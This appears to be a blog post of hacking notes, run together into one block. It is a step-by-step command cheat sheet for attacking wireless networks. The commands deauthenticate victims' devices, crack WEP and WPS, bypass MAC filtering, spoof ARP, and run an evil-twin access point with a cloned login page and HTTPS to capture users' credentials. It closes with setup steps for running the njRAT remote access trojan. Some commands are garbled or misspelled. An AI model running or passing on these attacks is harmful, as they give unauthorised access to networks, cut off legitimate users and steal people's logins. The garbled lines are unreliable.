NETWORK HACKING
ifconfig wlan0 hw ether (mac)(changing mac address) Checking for interface mode(master,manage,monitor) iwconfig Putting interface down ifconfig wlan0 down Killing interfering processes airmon-ng check kill Changing interface to Monitor mode airmon-ng start wlan0(wlan0mon) iwconfig wlan0 mode monitor(mon0) Bringing interface up ifconfig wlan0 up Listing broadcast devices(2.4 and 5 Gigahertz) airodump-ng (interface in monitor mode) airondump-ng --band -a (monitor mode) Listening on specific device airodump-ng --bssid (mac) --channel (number) --write test (interface in monitor mode) airondump-ng --band -a --bssid (mac) --channel (number) --write test (monitor mode) Deauthentication Attack Specicic device connected to wireless device aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) Multiple devices deauth aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) &>/dev/null & aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) &>/dev/null & Run Jobs to list background jobs jobs Killing Jobs kill %1 ))) for killing one job killall aireplay-ng ))) kiiling all jobs Deauth all client on a router airodump-ng --bssid (router mac) --channel (number) (interface in monitor mode) aireplay-ng --deauth 10000000 -a (router mac) (monitor mode) Breaking WEP Encryption Simple crack on busy network airodump-ng --bssid (mac) --channel (number) --write test (interface in ) aircrack-ng (captured file) If network not busy airodump-ng --bssid (mac) --channel (number) --write test (interface mode ) Associating with the target device aireplay-ng --fakeauth 0 -a (router mac) -h (attacker mac) (monitor mode) Force the AP to generate new IV aireplay-ng --arpreplay -b (router mac) -h (attacker mac) (monitor mode) for SKA(Shared Key Authentication Network) aireplay-ng --arpreplay -b (router mac) -h (connected device mac) (monitor mode) aircrack-ng (captured file) WPA/WPA2 Cracking Attacking WPS wash -i (monitor mode interface) Associating with the target device aireplay-ng --fakeauth 30 -a (router mac) -h (attacker mac) (monitor mode) reaver --bssid (target mac) --channel (number) -i (monitor mode interface) -vvv --no-associate GAINING ACCESS Targeting hidden network airodump-ng (monitor mode) airodump-ng --bssid (router mac) --channel (number) (interface mode) aireplay-ng --deauth 2 -a (router mac) -c (victim mac) (monitor mode) Mac Filtering Bypass Whitelist mode airodump-ng (monitor mode) airodump-ng --bssid (router mac) --channel (number) (interface mode) Connecting to hidden network Put the interface to Managed mode airmon-ng stop (monitor mode) / iwconfig (monitor mode) mode managed ifconfig wlan0 down macchanger -m (connected device mac) For Blacklist only randomize the (mac address) macchanger -r WAYS FOR ATTACKING CAPTIVE PORTALS(OPEN WIFI NETWORKS) 1. Changing Mac Address 2. Sniffing logins in monitor mode 3. Connect and sniff logins after running an arp spoofing attack 4. Create a Fake AP, ask users to login Details Sniffing logins in monitor mode ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up iwconfig airodump-ng (monitor mode) airodump-ng ---bssid (router mac) --channel (number) --write captivefile (monitor mode) Deauth the connected client aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) Open Wireshark to capture the packets Connect and sniff logins after running an arp spoofing attack on wireshark [+] mitmf --arp --spoof -i wlan0 --gateway (ip) Run route -n for gateway ip [+] ettercap -Tq -M arp:remote -i wlan0 /// ///means sniffing on all connected network Create a Fake AP, ask users to login [] Clone a login page of the network [] Create fake AP with the same name Disable network-manager service network-manager stop OPTIONAL COMMANDS TO AVOID IPTABLE INTERFERENCE echo 1 ) /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table --delete-chain iptables -P FORWARD ACCEPT CONFIGURING DNSMASQ set wifi interface interface=wlan0 set the ip range that can be given to clients dhcp-range=10.0.0.10,10.0.0.100,8h set the gateway ip address dhcp-option=3,10.0.0.1 set dns server address dhcp-option=6,10.0.0.1 redirect all requests to 10.0.0.1 address=10.0.0.1 Run on terminal dnsmasq -C (directory dnsmasq conf file) CONFIGURING HOSTAPD set wifi interface interface=wlan0 set network name ssid=mywifi(same as captive portal name) set channel channel=1 set dryver driver=nl80211 hostapd (directory hostapd conf file) -B ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 service apache2 start Enbling HTTPS on localhost openssl req -new -x509 -days 3650 -out cert.pem -keyout cert.key a2enmod ssl nano /etc/apache2/site-enabled/000.default.conf (virtualhost *:443) SSLEngine On SSLCertificateFile (directory of cert.pem) SSLCertificateKeyFile (directory of cert.key) (/virtualhost) nano /etc/apache2/ports.conf Listen 443 service apache2 restart [] Deauth users to use the fake network with the cloned page aireplay-ng --deauth 10000000 -a (router mac) -c (victim1 mac) (monitor mode) &) /dev/null & aireplay-ng --deauth 10000000 -a (router mac) -c (victim2 mac) (monitor mode) &) /dev/null & [] Sniff the login info hostapd (directory hostapd conf file) -B tshark -i wlan0 -w mywifi.cap
Setting Up and Using NjRat on Kali
Setting Up Environment sudo dpkg --add-architecture i386 sudo apt install wine32 sudo wget http://www.kegel.com/wine/winetricks sudo chmod +x winetricks sudo mv winetricks /usr/bin/ sudo apt update WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot WINEPREFIX=~/.wine32 WINEARCH=win32 winetricks dotnet32 sudo apt install mono-complete WINEPREFIX=~/.wine32 WINEARCH=win32 wine /path/njRat/njRat.exe
Comments
Post a Comment